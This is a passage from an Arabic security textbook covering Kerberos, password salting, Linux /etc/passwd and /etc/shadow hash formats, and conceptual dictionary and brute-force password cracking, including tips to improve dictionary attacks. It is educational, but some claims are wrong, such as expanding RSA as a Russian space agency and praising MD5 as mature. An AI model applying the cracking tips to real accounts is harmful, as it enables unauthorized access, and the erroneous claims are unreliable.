‫اﻟﺧدﻣﺎت اﻟﺗﻲ ﯾؤذن ﻟﮭﺎ‪ .‬ﻣن اﻟﻣﮭم أن ﻧﻼﺣظ أﻧﮫ ﻟن ﯾﻛون ھﻧﺎك اﺗﺻﺎل ﻣﺑﺎﺷر ﺑﯾن ﺧوادم اﻟﺗطﺑﯾﻘﺎت وﻣرﻛز ﺗوزﯾﻊ اﻟﻣﻔﺎﺗﯾﺢ )‪(KDC‬‬
‫‪ Key Distribution Center‬؛ ﺧدﻣﺔ اﻟﺗذاﻛر‪ ،‬ﺣﺗﻰ ﻟو ﺗم ﺗﺣزﯾﻣﮭﺎ )‪ (packeted‬ﺑواﺳطﺔ ‪ ،TGS‬واﻟوﺻول إﻟﻰ اﻟﺧدﻣﺔ ﯾﻛون ﻓﻘط ﻣن‬
‫ﺧﻼل اﻟﻌﻣﯾل اﻟذى ﯾرﻏب ﻓﻲ اﻟوﺻول إﻟﯾﮭﺎ‪.‬‬

‫‪Salting‬‬

‫‪ Salting‬ھو وﺳﯾﻠﺔ ﻟﺟﻌل ﻛﻠﻣﺎت اﻟﻣرور أﻛﺛر أﻣﻧﺎ ﻋن طرﯾﻖ إﺿﺎﻓﺔ ﺳﻼﺳل ﻋﺷواﺋﯾﺔ ﻣن اﻟﺣروف إﻟﻰ ﻛﻠﻣﺎت اﻟﻣرور ﻗﺑل ﺣﺳﺎب ھﺎش‬
‫‪ MD5‬اﻟﺧﺎﺻﺔ ﺑﮭم‪ .‬وھذا ﯾﺟﻌل ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر أﺻﻌب‪ .‬ﻛﻠﻣﺎ زاد أطول اﻟﺳﻠﺳﻠﺔ اﻟﻌﺷواﺋﯾﺔ‪ ،‬ﻛﻠﻣﺎ ازدادت ﺻﻌوﺑﺔ ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر‪.‬‬
‫ﯾﺟب أن ﺗﻛون ﺳﻠﺳﻠﺔ اﻷﺣرف اﻟﻌﺷواﺋﯾﺔ ﻣزﯾﺞ ﻣن اﻷﺣرف اﻷﺑﺟدﯾﺔ اﻟرﻗﻣﯾﺔ‪ .‬ﻣﺳﺗوى اﻷﻣﺎن أو ﻗوة ﺣﻣﺎﯾﺔ ﻛﻠﻣﺎت اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك ﺿد‬
‫ھﺟﻣﺎت ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺧﺗﻠﻔﺔ ﺗﻌﺗﻣد ﻋﻠﻰ طول ﺳﻠﺳﻠﺔ اﻟﻌﺷواﺋﯾﺔ ﻟﻸﺣرف‪ .‬ھذه ﯾداﻓﻊ ﺿد ‪.pre-computed hash attacks‬‬

‫ﻓﻲ ﻋﻠم اﻟﺗﺷﻔﯾر‪ ،‬ﻓﺎن ‪ salting‬ﯾﺗﻛون ﻣن ﺑﺗﺎت ﻋﺷواﺋﯾﺔ )‪ (random bit‬اﻟﺗﻲ ﺗﺳﺗﺧدم ﻛﺄﺣد اﻟﻣدﺧﻼت إﻟﻰ وظﯾﻔﺔ ﻓﻲ اﺗﺟﺎه واﺣد وﻏﯾرھﺎ‬
‫ﻣن اﻟﻣدﺧﻼت ھو ﻛﻠﻣﺔ اﻟﺳر‪ .‬ﺑدﻻ ﻣن ﻛﻠﻣﺎت اﻟﺳر‪ ،‬ﻓﻧﺎﺗﺞ وظﯾﻔﺔ ﻓﻲ اﺗﺟﺎه واﺣد ﯾﻣﻛن ﺗﺧزﯾﻧﮭﺎ واﺳﺗﺧداﻣﮭﺎ ﻟﻣﺻﺎدﻗﺔ اﻟﻣﺳﺗﺧدﻣﯾن‪ .‬ﯾﻣﻛن أﯾﺿﺎ‬
‫ﺿم ‪ salting‬ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور ﻋن طرﯾﻖ ‪ key derivation function‬ﻟﺗوﻟﯾد ﻣﻔﺗﺎح ﻟﻼﺳﺗﺧدام ﻣن ﻗﺑل اﻟﻧص اﻟﻣﺷﻔر او ﻏﯾرھﺎ ﻣن‬
‫ﺧوارزﻣﯾﺎت اﻟﺗﺷﻔﯾر‪.‬‬

‫ﻣﻊ ھذه اﻟﺗﻘﻧﯾﺔ ﯾﻣﻛن أن ﺗﺗوﻟد ھﺎﺷﺎت ﻣﺧﺗﻠﻔﺔ ﻟﻧﻔس ﻛﻠﻣﺔ اﻟﻣرور‪ .‬وھذا ﯾزﯾد ﻣن ﺻﻌوﺑﺔ اﻟﻣﮭﻣﺔ ﻋﻠﻰ اﻟﻣﮭﺎﺟم ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر اﻟﺻﻌﺑﺔ‪.‬‬
‫ﻓﻲ ھذا اﻟﻣﺛﺎل‪ ،‬واﺛﻧﯾن ﻣن اﻟﻣﺳﺗﺧدﻣﯾن أﻟﯾس وﺳﯾﺳﯾل ﻟﮭﺎ ﻧﻔس ﻛﻠﻣﺎت اﻟﺳر وﻟﻛن ﻣﻊ ﻗﯾم ھﺎش ﻣﺧﺗﻠﻔﺔ‪ .‬ﺣﯾث ﯾﺗم إﻧﺷﺎء ھﺎش ﻋﺷواﺋﻲ ﻟﻛل‬
‫ﻣﺳﺗﺧدم ﻋﻠﻰ ﺣدة‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪320‬‬

‫‪Linux Authentication‬‬

‫ﺗﻨﻔﯿﺬ اﻟﺴﯿﺎﺳﺎت اﻟﺘﻲ ﺗﺘﺤﻜﻢ ﻓﻲ ﻛﯿﻔﯿﺔ اﻟﻮﻟﻮج إﻟﻰ ﻣﻮارد ﺟﮭﺎز اﻟﺘﺸﻐﯿﻞ‪ ،‬وﻣﺪى ھﺬا اﻟﻮﻟﻮج‪ ،‬أﻣﺮ أﺳﺎﺳﻲ ﻷﻣﻦ اﻟﻜﻤﺒﯿﻮﺗﺮ‪ .‬أﻧﻈﻤﺔ اﻟﻜﻤﺒﯿﻮﺗﺮ اﻟﺤﺪﯾﺜﺔ‬
‫ﺗﻨﻔﯿﺬ ھﺬه اﻟﺴﯿﺎﺳﺎت ﺑﺎﺳﺘﺨﺪام ﻧﻤﻮذج اﻟﻤﺴﺘﺨﺪم])‪ ،[(user_model‬اﻟﺬي ﯾﻌﯿﻦ اﻣﺘﯿﺎزات ﻣﻌﯿﻨﺔ ﻟﺒﻌﺾ اﻟﻤﺴﺘﺨﺪﻣﯿﻦ‬

‫ﻧﻤﺎذج اﻟﻤﺴﺘﺨﺪم ])‪ ،[(user_model‬ﺗﻌﻤﻞ ﻋﻠﻰ اﻟﺠﻤﻊ ﺑﯿﻦ إﺟﺎﺑﺘﯿﻦ ﻋﻠﻰ ﺳﺆاﻟﯿﻦ ﻣﺨﺘﻠﻔﯿﻦ‪:‬‬
‫اﻷول ھﻮ اﻻﺳﺘﯿﺜﺎق‪/‬اﻟﻤﺼﺎدﻗﺔ ])‪ :[(authentication‬ھﻞ ھﺬا ھﻮ اﻟﻤﺴﺘﺨﺪم اﻟﺬي أﻋﺘﻘﺪ أﻧﮫ ھﻮ؟‬
‫ً‬
‫واﻟﺜﺎﻧﻲ ھﻮ اﻟﺘﺼﺮﯾﺢ])‪ :[(Authorization‬اﻵن أﻧﻨﻲ ﻣﻘﺘﻨﻊ ﺑﺄﻧﻨﻲ أﻋﺮف ھﻮﯾﺔ ھﺬا اﻟﻤﺴﺘﺨﺪم‪ ،‬ﻣﺎ ھﻲ اﻟﻤﻮارد اﻟﺘﻲ ﯾﻨﺒﻐﻲ أن ﯾﻜﻮن ﻗﺎدرا ﻋﻠﻰ‬
‫اﻟﻮﺻﻮل إﻟﯿﮭﺎ؟‬
‫‪ -‬اﻟﺮد ﻋﻠﻰ اﻟﺴﺆال اﻷول ﻣﻦ ﻗﺒﻞ ]‪[user authentication‬‬
‫‪ -‬اﻟﺮد ﻋﻠﻰ اﻟﺜﺎﻧﻲ ﻣﻦ ﺧﻼل رﺑﻂ ﻣﻌﻠﻮﻣﺎت اﻟﺤﺴﺎب ])‪ [(account information‬ﻣﻊ ھﻮﯾﺔ اﻟﻤﺼﺎدﻗﺔ‪.‬‬

‫ﺗﺎرﯾﺧﯾﺎ‪ ،‬اﺳﺗﺧدﻣت أﻧظﻣﺔ ﯾوﻧﻛس ﻣﺣﺗوﯾﺎت اﻟﻣﻠف ‪ /etc/passwd‬ﻟﻠرد ﻋﻠﻰ ﻛل اﻷﺳﺋﻠﺔ‪.‬‬

‫ﻣﺤﺘﻮﯾﺎت ‪ /etc/passwd‬ﺗﻘﺪم ﻛﻞ ﻣﻦ اﻟﻤﺼﺎدﻗﺔ ])‪ [(authentication‬وﻣﻌﻠﻮﻣﺎت اﻟﺤﺴﺎب ])‪.[(account information‬‬

‫ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﻤﺸﻔﺮة )ﻓﻲ اﻟﺤﻘﻞ اﻟﺜﺎﻧﻲ( ﺗﻮﻓﺮ ﻋﻤﻠﯿﺔ اﻟﻤﺼﺎدﻗﺔ ])‪" :[(authentication‬إذا ﻛﻨﺖ ﺣﻘﺎ أﻟﻔﯿﺲ‪ ،‬أﻋﻄﻨﻨﻲ ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﻔﯿﺲ"‪.‬‬
‫إذا ﺣﺪﺛﺖ اﻟﻤﺼﺎدﻗﺔ ﺑﺸﻜﻞ ﺻﺤﯿﺢ‪ ،‬ﻓﺎن اﻟﻨﻈﺎم ﯾﻔﺘﺮض أن ﻣﻦ ﻗﺎم ﺑﺘﺴﺠﯿﻞ اﻟﺪﺧﻮل ھﻮ ﺣﻘﺎ أﻟﻔﯿﺲ‪ .‬وﺑﻤﺠﺮد إﻧﺸﺎء ﺑﯿﺎﻧﺎت اﻟﻤﺴﺘﺨﺪم‪ ،‬ﻓﺎن اﻟﻤﻠﻒ‬
‫‪ /etc/passwd‬ﯾﻮﻓﺮ ﻣﻌﻠﻮﻣﺎت أﺧﺮى ﻋﻦ اﻟﻤﺴﺘﺨﺪم أﻟﻔﯿﺲ‪ :‬ﻣﺜﻞ ‪ UID‬و‪ GID‬و‪ home directory‬وﻧﻮع اﻟﺸﻞ اﻻﻓﺘﺮاﺿﻲ ﻟﮫ‪.‬‬

‫ﻓﯿﻤﺎ ﺑﻌﺪ أﺻﺒﺤﺖ أﻧﻈﻤﺔ ﯾﻮﻧﻜﺲ أﻛﺜﺮ ﻗﻠﻘﺎ ﻋﻠﻰ اﻷﻣﻦ‪ ،‬وﻗﺪ وﺟﮭﺖ ھﺬه اﻟﺮﻗﺎﺑﺔ ﻣﻊ ﺗﻘﻨﯿﺔ ﺗﺴﻤﻰ ﻛﻠﻤﺎت اﻟﺴﺮ اﻟﻈﻞ])‪: [(shadow passwords‬‬
‫ﺣﯿﺚ ﺗﻢ ﻧﻘﻞ ﻛﻠﻤﺎت اﻟﻤﺮور إﻟﻰ اﻟﻤﻠﻒ ]‪ [/etc/shadow‬ﻣﻠﻒ أﻛﺜﺮ أﻣﻨﺎ‪ ،‬ﺛﻢ ﯾﻀﻊ ﻣﻜﺎﻧﮫ اﻟﺮﻣﺰ ‪ X‬ﻓﻲ اﻟﻤﻠﻒ ]‪.[/etc/passwd‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪321‬‬

‫ﻣﺎذا ﯾﺤﺪث ﻋﻨﺪ ﺗﻌﯿﯿﻦ ﻛﻠﻤﺔ ﻣﺮور اﻟﻔﯿﺲ "‪“apple‬ﻣﻊ اﻷﻣﺮ ‪passwd‬؟‬

‫اﻷﻣﺮ ‪ passwd‬ﯾﻌﻤﻞ ﻋﻠﻰ إﺟﺮاء اﻟﺨﻄﻮات اﻟﺘﺎﻟﯿﺔ‪.‬‬


‫اﻟﻤﺴﺘﺨﺪم ﯾﻌﻤﻞ ﻋﻠﻰ ﺗﻮﻓﯿﺮ ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﻐﯿﺮ ﻣﺸﻔﺮة])‪"apple" :[(plaintext‬‬ ‫‪-‬‬
‫اﻷﻣﺮ ‪passwd‬ﯾﻌﻤﻞ ﻋﻠﻰ إﻧﺸﺎء ﺣﺮﻓﯿﻦ ﺑﺸﻜﻞ ﻋﺸﻮاﺋﻲ‪ ،‬واﻟﺘﻲ ﺗﺴﻤﻰ ﻣﻠﺢ ]‪ [salt‬ﻓﺘﺼﺒﺢ ﻛﻠﻤﺔ اﻟﺴﺮ ﻣﺜﻼ ]‪[f8apple‬‬ ‫‪-‬‬
‫ﺛﻢ ﯾﺘﻢ اﺳﺘﺨﺪام ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﻤﻤﻠﺤﺔ ]‪ [salted password‬ﻟﺘﺸﻔﯿﺮھﺎ ﻋﻦ طﺮﯾﻖ اﻟﺴﻠﺴﻠﺔ اﻟﻤﻌﺮوﻓﺔ ﻋﺎﻟﻤﯿﺎ ﻣﺤﺪدة ﻣﺴﺒﻘﺎ )ﻋﺎدة‬ ‫‪-‬‬
‫ﻣﺠﺮد ﺣﻔﻨﺔ ﻣﻦ اﻷﺻﻔﺎر(‪ ،‬ﻣﻤﺎ أﺳﻔﺮ ﻋﻦ ‪ 11‬ﺣﺮﻓﺎ ]‪[cyphertext] .[aHBT9lIoaZc‬‬
‫اﻷﻣﺮ ‪ passwd‬ﯾﻌﻤﻞ ﻋﻠﻰ إﺿﺎﻓﺔ ﺣﺮﻓﯿﻦ ﻣﻦ اﻟﻤﻠﺢ إﻟﻰ‪ ، cyphertext‬وﯾﺨﺰن ﺳﻮاء ﻓﻲ اﻟﻤﻠﻒ‪/etc/passwd‬‬ ‫‪-‬‬
‫ﻻﺣﻆ أن ﻣﻠﻒ‪ /etc/passwd‬ﯾﺨﺰن ﻓﻲ اﻟﻮاﻗﻊ ﻗﻄﻌﺘﯿﻦ ﻣﻦ اﻟﻤﻌﻠﻮﻣﺎت ﻓﻲ ﺣﻘﻞ ﻛﻠﻤﺔ اﻟﻤﺮور‪.‬وھﻤﺎ ‪ 11‬ﺣﺮﻓﺎ اﻷﺧﯿﺮة ھﻲ‬ ‫‪-‬‬
‫)"‪ ،cyphertext ("aHBT9lIoaZc‬وأول ﺣﺮﻓﯿﻦ ھﻢ ﻣﻠﺢ )"‪.("F8‬‬

‫ﻣﺎذا ﯾﺤﺪث ﻋﻨﺪﻣﺎ ﯾﺬھﺐ اﻟﻨﻈﺎم إﻟﻰ ﻣﺼﺎدﻗﮫ اﻟﻤﺴﺘﺨﺪم أﻟﻔﯿﺲ؟‬


‫اﻟﻤﺴﺘﺨﺪم اﻟﻔﯿﺲ ﯾﻌﻤﻞ ﻋﻠﻰ ﺗﺰود ﻛﻠﻤﺔ اﻟﺴﺮ اﻟﻐﯿﺮ ﻣﺸﻔﺮة‪"apple" :‬‬ ‫‪-‬‬

‫اﻟﻨﻈﺎم ﯾﻘﻮم ﺑﺎﻟﺒﺤﺚ ﻋﻦ اﻟﺤﺮﻓﯿﻦ ﻣﻦ اﻟﻤﻠﺢ ]‪[salt‬ﻣﻦ اﻟﻤﻠﻒ ‪ /etc/passwd‬وﯾﻘﻮم ﺑﺈﺿﺎﻓﺘﮫ إﻟﻰ ﻛﻠﻤﺔ اﻟﻤﺮور‪.‬‬ ‫‪-‬‬
‫ﯾﺴﺘﺨﺪم ﻧﻈﺎم ﻛﻠﻤﺔ اﻟﻤﺮور إﻧﺸﺎء ‪ cyphertext‬ﻣﻦ ﻛﻠﻤﺔ اﻟﺴﺮ اﻟﻤﻤﻠﺤﺔ ]‪ [salted password‬واﻟﻰ ﯾﻨﺘﺞ ﻣﻜﻮن ‪ 11‬ﺣﺮف‪.‬‬ ‫‪-‬‬
‫ﺛﻢ ﯾﻘﻮم اﻟﻨﻈﺎم ﺑﻤﻘﺎرﻧﺔ ‪ cyphertext‬إﻟﻰ ﻣﺎ ﺗﻢ ﺗﺨﺰﯾﻨﮫ ﻓﻲ ‪ ./etc/passwd‬إذا ﻛﺎﻧﺖ ﺗﻄﺎﺑﻖ‪ ،‬ﺗﺴﻤﺢ ﻟﻠﻤﺴﺘﺨﺪم ﺑﺎﻟﻮﻟﻮج‪.‬‬ ‫‪-‬‬

‫‪Password Management‬‬
‫ﺟﻌﻠﺖ أﻧﻈﻤﺔ ﻟﯿﻨﻜﺲ اﻟﺤﺪﯾﺜﺔ اﺛﻨﯿﻦ ﻣﻦ اﻟﺘﺤﺴﯿﻨﺎت ﻟﻠﺘﻘﻨﯿﺔ اﻟﺘﻘﻠﯿﺪﯾﺔ اﻟﻤﺬﻛﻮرة أﻋﻼه‪.‬‬
‫أوﻻ‪ ،‬وﻛﻤﺎ ﺳﺒﻖ ذﻛﺮه‪ ،‬أﻧﻈﻤﺔ ﻟﯿﻨﻜﺲ اﻟﺤﺪﯾﺜﺔ اﺳﺘﺨﺪام ﻛﻠﻤﺎت اﻟﻤﺮور اﻟﻈﻞ])‪ [(shadow password‬ﻟﺘﺨﺰﯾﻦ‪، cypthertext‬‬
‫ﺑﺤﯿﺚ ﺣﺘﻰ ﻛﻠﻤﺎت اﻟﺴﺮ اﻟﻤﺸﻔﺮة ﻟﯿﺴﺖ ﻣﺘﺎﺣﺔ ﻟﻠﺠﻤﮭﻮر‪.‬‬
‫ﺛﺎﻧﯿﺎ‪ ،‬أﻧﻈﻤﺔ ﻟﯿﻨﻜﺲ اﻟﯿﻮم اﺳﺘﺨﺪام ﺧﻮارزﻣﯿﺔ ‪ MD5‬أﻛﺜﺮ ﻧﻀﺠﺎ‪.‬‬
‫ﯾﺴﺘﺨﺪم ﯾﻮﻧﻜﺲ ﺑﺮوﺗﻮﻛﻮل اﻟﺘﺸﻔﯿﺮ اﻟﺘﻘﻠﯿﺪﯾﺔ واﻟﺘﻲ ﺑﺪورھﺎ ﺗﺴﺘﺨﺪم ﻣﻌﺪﻟﺔ ‪ DES‬ﺧﻮارزﻣﯿﺔ اﻟﺘﺸﻔﯿﺮ ﻋﻠﻰ أﺳﺎس ﻣﻔﺘﺎح ﺑﺖ ‪.56‬‬
‫وﻧﺘﯿﺠﺔ ﻟﺬﻟﻚ‪ ،‬أﺻﺒﺤﺖ ﻛﻠﻤﺎت اﻟﺴﺮ ﻣﺤﺪودة ﻓﻘﻂ ‪ 8‬أﺣﺮف ﻣﻦ اﻟﻨﻮع ‪ 8) ASCII:‬أﺣﺮف( * )‪ 7‬ﺑﺖ ‪ /‬ﺣﺮف( = )‪ 56‬ﺑﺖ(‪.‬‬

‫أﻧﻈﻤﺔ ﻟﯿﻨﻜﺲ اﻟﯿﻮم ﺗﺴﺘﺨﺪم ﻛﻠﻤﺔ اﻟﺴﺮ ذات ﺧﻮارزﻣﯿﺔ اﻟﺘﺸﻔﯿﺮ ‪ ،[MD5 password] MD5‬واﻟﺬي ﯾﺴﺘﺨﺪم ﻟﻠﺘﺸﻔﯿﺮ اﻷﻛﺜﺮ ﻧﻀﺠﺎ واﻟﺬي‬
‫ﯾﺴﺘﻨﺪ إﻟﻰ ﻣﻔﺘﺎح أﻛﺒﺮ ﺑﻜﺜﯿﺮ‪.‬‬
‫اﻷداة ‪ system-config-authentication‬ﺗﺳﺗﺧدم ﻟﺗﺣوﯾل ﺑﯾن أي ﻧظﺎم ﻣﺳﺗﺧدم ﻓﻲ ﺗﺷﻔﯾر اﻟرﻗم اﻟﺳري ﺳواء ‪ md5 password‬أو‬
‫‪ shadow password‬ﻓﻲ أﻧظﻣﺔ اﻟﺗﺷﻐﯾل رﯾدھﺎت وﻓﯾدورا‪.‬‬

‫أوﻻ‪ ،‬ﯾﺘﻢ ﺗﺨﺰﯾﻦ ‪ cyphertext‬ﻓﻲ اﻟﻤﻠﻒ ‪./etc/shadow‬‬

‫ﺛﺎﻧﯿﺎ‪ ،‬ﻛﻠﻤﺔ اﻟﺴﺮ اﻟﻤﺸﻔﺮة ‪ MD5‬اﻵن ﺗﻨﻘﺴﻢ إﻟﻰ ﺛﻼﺛﺔ ﻣﺠﺎﻻت ﯾﻤﻜﻦ ﺗﻤﯿﯿﺰھﺎ ﺑﺴﮭﻮﻟﺔ‪ ،‬ﺗﺤﺪد ﺑﻮاﺳﻄﺔ ﻋﻼﻣﺔ اﻟﺪوﻻر )"‪.("$‬‬
‫اﻟﺤﻘﻞ اﻷول )"‪ ("1‬ھﻮ ﻣﻌﺮف اﻟﺒﺮوﺗﻮﻛﻮل‪ ،‬وﺗﻮﻓﯿﺮ آﻟﯿﺔ ﻟﻠﺘﺮﺣﯿﻞ ﺑﺴﮭﻮﻟﺔ إﻟﻰ ﺑﺮوﺗﻮﻛﻮﻻت ﻣﺨﺘﻠﻔﺔ ﻓﻲ اﻟﻤﺴﺘﻘﺒﻞ ‪. MD5‬وھﻮ ﺑﺮوﺗﻮﻛﻮل "‪".1‬‬
‫اﻟﺤﻘﻞ اﻟﺜﺎﻧﻲ‪ ،"CBYGbXRT" ،‬ھﻮ اﻟﻤﻠﺢ‪ ،‬واﻟﺘﻲ ﺗﻮﺳﻌﺖ اﻵن إﻟﻰ ‪ 8‬أﺣﺮف‪.‬‬
‫اﻟﺤﻘﻞ اﻷﺧﯿﺮ‪ ،"xTMRC01udINgd1LH/9quu1" ،‬ھﻮ ‪ cyphertext‬ﻧﺘﯿﺠﺔ ﻟﻠﺘﺸﻔﯿﺮ‪.‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪322‬‬

‫ﺗﻘﻧﯾﺎت ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ‪PASSWORD CRACKING TECHNIQUES‬‬

‫‪ Password cracking‬ھﻲ اﻟﺗﻘﻧﯾﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﻻﻛﺗﺷﺎف ﻛﻠﻣﺎت اﻟﻣرور‪ .‬ھذا ھو اﻟﺳﺑﯾل ﻟﻛﺳب اﻻﻣﺗﯾﺎزات اﻟﻛﻼﺳﯾﻛﯾﺔ ﻟﻧظﺎم اﻟﻛﻣﺑﯾوﺗر أو‬
‫اﻟﺷﺑﻛﺔ‪ .‬اﻟﻧﮭﺞ اﻟﻣﺷﺗرك ﻟﻛﺳر ﻛﻠﻣﺔ ﻣرور ھو اﺳﺗﻣرار ﻣﺣﺎوﻟﺔ ﺗﺧﻣﯾن ﻛﻠﻣﺔ اﻟﻣرور ﻣﻊ ﺗوﻟﯾﻔﺎت ﻣﺧﺗﻠﻔﺔ ﺣﺗﻰ ﺗﺣﺻل اﻟﻰ واﺣدة ﺻﺣﯾﺣﺔ‪.‬‬
‫ھﻧﺎك ﺧﻣﺳﺔ أﺳﺎﻟﯾب ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪.‬‬

‫‪DICTIONARY ATTACKS‬‬

‫ﻓﻲ ‪ ،dictionary attack‬ﯾﺗم ﺗﺣﻣﯾل ﻣﻠف ‪dictionary‬إﻟﻰ ﺗطﺑﯾﻖ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور )‪ (Cracking application‬اﻟذي ﯾﺳﺗﺧدم ﺿد‬
‫ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن‪ .‬ھذا اﻟﻣﻠف ھو ﻣﻠف ﻧﺻﻲ ﯾﺣﺗوي ﻋﻠﻰ ﻋدد ﻣن ﻛﻠﻣﺎت اﻟﻘﺎﻣوس )‪ .(dictionary word‬ﯾﺳﺗﺧدم اﻟﺑرﻧﺎﻣﺞ ﻛل ﻛﻠﻣﺔ‬
‫ﻣوﺟودة ﻓﻲ اﻟﻘﺎﻣوس ﻟﻠﻌﺛور ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﺳر‪ Dictionary attack .‬أﻛﺛر ﻓﺎﺋدة ﻣن ھﺟﻣﺎت اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ‪(brute forcing attack).‬‬
‫وﻟﻛن ھذا اﻟﮭﺟوم ﻻ ﯾﻌﻣل ﻣﻊ اﻷﻧظﻣﺔ اﻟﺗﻲ ﺗﺳﺗﺧدم ‪.passphrases‬‬

‫ھذا اﻟﮭﺟوم ﯾﻣﻛن ﺗطﺑﯾﻘﮫ ﻓﻲ ظل ﺣﺎﻟﺗﯾن‪:‬‬


‫‪ -‬ﻓﻲ ﺗﺣﻠﯾل اﻟﺷﻔرات)‪ ، (cryptanalysis‬ﺣﯾث ﯾﺗم اﺳﺗﺧداﻣﮫ ﻟﻣﻌرﻓﺔ ﻣﻔﺗﺎح ﻓك اﻟﺗﺷﻔﯾر ﻟﻠﺣﺻول ﻋﻠﻰ اﻟﻧص اﻟﻌﺎدي ﻣن ﻧص ﻣﺷﻔر‬
‫)‪.(ciphertext‬‬
‫‪ -‬ﻓﻲ أﻣن اﻟﻛﻣﺑﯾوﺗر‪ ،‬ﻟﺗﺟﻧب ﻣﺻﺎدﻗﺔ )‪(authentication‬اﻟوﺻول إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻋن طرﯾﻖ ﺗﺧﻣﯾن ﻛﻠﻣﺎت اﻟﺳر‪.‬‬

‫طرﯾﻘﺔ ﺗﺣﺳﯾن ﻧﺟﺎح ھﺟوم اﻟﻘﺎﻣوس‪: dictionary attack‬‬


‫‪ -‬اﺳﺗﺧدام ﻋدد ﻣن ‪ dictionaries‬ﻣﺛل ‪ Technical dictionaries‬و‪ foreign dictionaries‬ﻣﻣﺎ ﯾﺳﺎﻋد ﻋﻠﻰ اﺳﺗرﺟﺎع ﻛﻠﻣﺔ‬
‫اﻟﻣرور اﻟﺻﺣﯾﺣﺔ‬
‫‪ -‬اﺳﺗﺧدام ﻣﻌﺎﻟﺞ اﻟﻧﺻوص )‪ (string manipulation‬ﻋﻠﻰ ‪ ،dictionary‬ﯾﻌﻧﻲ إذا ﻛﺎن اﻟﻘﺎﻣوس ﯾﺣﺗوي ﻋﻠﻰ ﻛﻠﻣﺔ ‪system‬‬
‫ﻓﺎن ﺳوف ﯾﺣﺎول ﻣﻌﺎﻟﺟﺔ اﻟﺳﻠﺳﻠﺔ واﺳﺗﺧدام" ‪" metsys‬وﻏﯾرھﺎ‪.‬‬

‫ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ‪BRUTE FORCING ATTACKS‬‬


‫ﺧوارزﻣﯾﺎت اﻟﺗﺷﻔﯾر )‪ (cryptographic algorithms‬ﯾﺟب أن ﺗﺻﻠب ﺑﻣﺎ ﻓﯾﮫ اﻟﻛﻔﺎﯾﺔ ﻣن أﺟل ﻣﻧﻊ ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ)‪. (brute-force attack‬‬
‫ﺗﻌرﯾﻔﮫ ﻛﻣﺎ ذﻛرت وﻛﺎﻟﺔ اﻟﻔﺿﺎء اﻟروﺳﯾﺔ)‪ " :(RSA‬اﻟﺑﺣث اﻟﺣﺻري ﻋن اﻟﻣﻔﺎﺗﯾﺢ)‪ ، (Exhaustive key-search‬أو ﺑﺣث اﻟﻘوة اﻟﻐﺎﺷﻣﺔ‬
‫)‪ ،(brute-force search‬ھو اﻷﺳﻠوب اﻷﺳﺎﺳﻲ ﻟﻣﺣﺎوﻟﺔ اﺳﺗﺧدام ﻛل ﻣﻔﺗﺎح ﻣﻣﻛن ﺑدوره ﺣﺗﻰ ﯾﺗم اﻟﺗﻌرف ﻋﻠﻰ اﻟﻣﻔﺗﺎح اﻟﺻﺣﯾﺢ" ‪.‬‬

‫ﻋﻧدﻣﺎ ﯾﺣﺎول ﺷﺧص ﻣﺎ ﯾﻧﺗﺞ ﻛل ﻣﻔﺗﺎح ﺗﺷﻔﯾر واﺣد ﻟﻠﺑﯾﺎﻧﺎت ﺣﺗﻰ ﯾﺗم اﻟﻛﺷف ﻋن اﻟﻣﻌﻠوﻣﺎت اﻟﻣطﻠوﺑﺔ‪ ،‬وھذا ﻣﺎ ﯾطﻠﻖ ﻋﻠﯾﮫ ھﺟوم اﻟﻘوة‬
‫اﻟﻐﺎﺷﻣﺔ‪ .‬ﺣﺗﻰ ھذا اﻟﺗﺎرﯾﺦ‪ ،‬ﺗم ﺗﻧﻔﯾذ ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﻣن ﻗﺑل أوﻟﺋك اﻟذﯾن ﻟدﯾﮭم ﻣﺎ ﯾﻛﻔﻲ ﻣن ﻗوة اﻟﻣﻌﺎﻟﺟﺔ‪.‬‬
‫ﺣﻛوﻣﺔ اﻟوﻻﯾﺎت اﻟﻣﺗﺣدة )ﻓﻲ ﻋﺎم ‪ (1977‬ﺗﻌﺗﻘد أن ﻣﻌﯾﺎر ﺗﺷﻔﯾر اﻟﺑﯾﺎﻧﺎت‪ 56‬ﺑت )‪ (DES‬ﻛﺎﻓﻲ ﻟردع ھﺟﻣﺎت اﻟﻘوة اﻟﻐﺎﺷﻣﺔ‪ ،‬وﻗﺎﻟت ﺑﺄﻧﮫ ﺗم‬
‫اﺧﺗﺑﺎر ذﻟك ﻋﻠﻰ ﻣﺟﻣوﻋﺎت ﻓﻲ ﺟﻣﯾﻊ أﻧﺣﺎء اﻟﻌﺎﻟم‪.‬‬
